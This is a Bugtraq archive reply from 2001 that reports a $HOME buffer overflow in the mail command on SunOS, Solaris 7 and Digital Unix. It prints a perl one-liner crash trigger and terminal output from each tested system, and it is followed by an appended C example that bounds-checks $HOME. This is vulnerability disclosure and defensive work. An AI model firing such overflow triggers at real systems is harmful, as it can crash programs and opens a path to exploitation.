Bugtraq mailing list archives

Re: $HOME buffer overflow in SunOS 5.8 x86
From: Gunnar Wolf <gwolf () campus iztacala unam mx>
Date: Tue, 5 Jun 2001 13:54:11 -0500 (CDT)

On Mon, Jun 04, 2001 at 06:14:30PM +0300, Georgi Guninski wrote:
$HOME buffer overflow in SunOS 5.8 x86
Systems affected:
SunOS 5.8 x86; have not tested on other OSes
Risk: Medium
Date: 4 June 2001

HOME=`perl -e 'print "A"x1100'` ; export HOME
mail a
eip gets smashed with 0x41414141.

0:jpmeier () sol:~> HOME=`perl -e 'print "A"x1100'` ; export HOME
0:jpmeier () sol:/home/jpmeier> mail a
^Cmail: Mail saved in dead.letter
1:jpmeier () sol:/home/jpmeier> uname -a
SunOS sol 5.8 Generic_108528-04 sun4u sparc SUNW,Ultra-5_10

also tried larger buffers.

Solaris/sparc appears not vulnerable. Maybe it's an x86 bug only.

Solaris 7/Sparc is vulnerable:

[gwolf () sun gwolf]$ uname -a
SunOS sun.mydomain.org 5.7 Generic_106541-16 sun4u sparc SUNW,Ultra-5_10
[gwolf () sun gwolf]$ HOME=`perl -e 'print "A"x1100'` ; export HOME
[gwolf () sun gwolf]$ mail a
^Cmail: ERROR signal 10
mail: ERROR signal 10
mail: ERROR signal 10
mail: ERROR signal 10
mail: ERROR signal 10

Digital Unix V4.0C is vulnerable:

digital> uname -a
OSF1 digital V4.0 564.32 alpha
digital> setenv HOME `perl -e 'print "a"x1100'`
Received disconnect: Command terminated on signal 6.

[and I am logged out of the machine]

I tested it also on OpenBSD 2.8/i386 and /sparc, RedHat Linux 6.1/alpha
and Debian GNU/Linux 2.2r3/i386, and they are not vulnerable.

Gunnar Wolf - gwolf () campus iztacala unam mx - (+52)5623-1119
Desarrollo y Admon. de Sistemas en Red - FES Iztacala - UNAM
Departamento de Seguridad en Computo   -   DGSCA    -   UNAM
Quidquid latine dictum sit, altum viditur.
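The crash reports above (eip overwritten with 0x41414141, SIGBUS/SIGABRT on the other platforms) are the signature of an environment value copied into a fixed-size stack buffer without a length check. The following is an added example, not code from this thread or from any vendor's mail(1) source: it shows the defensive handling of $HOME that prevents this bug class. The buffer size HOME_BUFSZ, the env_lookup helper and the constructed environments are assumptions chosen for the example; the thread does not give the real buffer size.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>

/* Illustrative fixed-size destination buffer (assumed size; the real
 * mail(1) buffer size is not stated in the thread). */
#define HOME_BUFSZ 1024

/* Look up NAME in a caller-supplied environment array.  Taking envp as a
 * parameter lets the example run on constructed input instead of the
 * real process environment. */
static const char *env_lookup(char *const envp[], const char *name)
{
    size_t n = strlen(name);
    for (size_t i = 0; envp[i] != NULL; i++) {
        if (strncmp(envp[i], name, n) == 0 && envp[i][n] == '=')
            return envp[i] + n + 1;
    }
    return NULL;
}

/* Copy HOME into dst[dstsz] only if it is an absolute path, fits with its
 * terminator, and contains no control characters.  Returns 0 on success,
 * -1 if the value is missing or rejected; dst is always NUL-terminated.
 * The unchecked pattern this replaces is strcpy(dst, getenv("HOME")),
 * which an attacker-supplied 1100-byte value overruns. */
int load_home(char *const envp[], char *dst, size_t dstsz)
{
    const char *home = env_lookup(envp, "HOME");
    if (dstsz == 0)
        return -1;
    dst[0] = '\0';
    if (home == NULL || home[0] != '/')
        return -1;

    /* Bounded length scan: never look further than we could store. */
    size_t len = 0;
    while (len < dstsz && home[len] != '\0')
        len++;
    if (len >= dstsz)
        return -1;              /* too long: refuse rather than truncate silently */

    for (size_t i = 0; i < len; i++) {
        if (iscntrl((unsigned char)home[i]))
            return -1;          /* embedded control characters are never a valid path */
    }
    memcpy(dst, home, len + 1); /* length already verified, includes the NUL */
    return 0;
}

/* Exercise load_home with constructed environments, including the
 * 1100-byte "A" value from the thread.  Returns how many values were
 * rejected so the result can be checked without parsing output. */
int demo(void)
{
    static char big[1101];
    memset(big, 'A', 1100);
    big[1100] = '\0';
    static char bigvar[1200];
    snprintf(bigvar, sizeof bigvar, "HOME=%s", big);

    char *env_ok[]  = { "USER=jdoe", "HOME=/home/jdoe", NULL };  /* constructed */
    char *env_bad[] = { "USER=jdoe", bigvar, NULL };             /* constructed */
    char *env_rel[] = { "HOME=home/jdoe", NULL };                /* constructed */

    char buf[HOME_BUFSZ];
    int rejected = 0;
    rejected += load_home(env_ok, buf, sizeof buf) != 0;
    printf("accepted: %s\n", buf);
    rejected += load_home(env_bad, buf, sizeof buf) != 0;
    rejected += load_home(env_rel, buf, sizeof buf) != 0;
    return rejected;
}

int main(void)
{
    printf("rejected HOME values: %d\n", demo());
    return 0;
}
```

The oversized value and the relative path are both refused before any byte is copied, and the destination stays NUL-terminated on every path; with the checked copy in place the `HOME=$(perl -e 'print "A"x1100')` case from the thread produces an error return instead of a smashed return address.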
